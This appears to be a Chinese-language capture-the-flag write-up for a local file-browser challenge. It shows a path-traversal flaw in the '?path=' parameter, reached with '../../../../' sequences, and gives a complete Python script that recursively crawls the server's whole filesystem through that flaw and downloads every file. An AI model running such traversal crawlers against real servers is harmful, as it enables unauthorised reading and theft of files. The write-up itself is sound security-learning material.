LOADING

垫刀之路04_一个文件浏览器

网络安全

垫刀之路04: 一个文件浏览器

先点一个路径

http://127.0.0.1:7489/?path=/src

?path= 路径遍历漏洞,尝试访问?path=../,可行 输入足够多的../../../可到达根目录 根目录http://127.0.0.1:7489/?path=../../../../

有一个flag

文件内容:
flag 不在这里哦,你可以换个地方找找。
位置不远,耐心一点

flag在127.0.0.1:1943/?path=../../../../tmp/flag

很难找

import os
import requests
from urllib.parse import urljoin

# 初始化基础URL
base_url = 'http://127.0.0.1:1943/?path=../../../..'

# 用于存储已访问的URL,避免重复访问
visited_urls = set()

# 定义一个函数,用于下载文件
def download_file(url, path):
    try:
        response = requests.get(url, timeout=10)  # 设置10秒超时
        response.raise_for_status()  # 确保请求成功

        # 检查响应内容是否为空
        if not response.content:
            print(f"Warning: Empty content for {url}, skipping download.")
            return

        # 确保目录存在
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as f:
            f.write(response.content)
        print(f"Downloaded {url} to {path}")
    except requests.exceptions.Timeout:
        print(f"Request timed out for {url}")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred while downloading {url}: {e}")

# 定义一个函数,用于遍历目录
def traverse(url):
    # 避免重复访问
    if url in visited_urls:
        return
    visited_urls.add(url)

    try:
        response = requests.get(url, timeout=10)  # 设置10秒超时
        response.raise_for_status()  # 确保请求成功

        # 解析HTML内容,查找链接
        from bs4 import BeautifulSoup
        soup = BeautifulSoup(response.text, 'html.parser')
        for link in soup.find_all('a', href=True):
            # 获取完整的URL
            full_url = urljoin(url, link['href'])
            # 检查是否为目录
            if ' (Directory)' in link.text:
                # 递归遍历子目录
                traverse(full_url)
            else:
                # 下载文件
                file_url = urljoin(url, link['href'])
                file_path = os.path.join('.', os.path.basename(file_url))
                download_file(file_url, file_path)
    except requests.exceptions.Timeout:
        print(f"Request timed out for {url}")
    except requests.exceptions.RequestException as e:
        print(f"An error occurred while traversing {url}: {e}")

# 开始遍历
traverse(base_url)

运行后,会下载所有文件到当前目录 大概20分钟 下载完查找flag